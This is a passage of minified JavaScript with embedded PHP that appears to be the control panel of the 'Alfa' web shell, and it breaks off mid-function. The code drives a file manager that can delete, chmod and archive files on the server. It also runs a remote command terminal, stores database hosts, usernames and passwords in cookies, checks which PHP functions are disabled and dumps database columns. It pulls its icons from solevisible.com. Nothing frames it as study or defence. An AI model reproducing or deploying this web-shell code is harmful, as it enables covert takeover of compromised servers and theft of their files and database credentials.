alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" 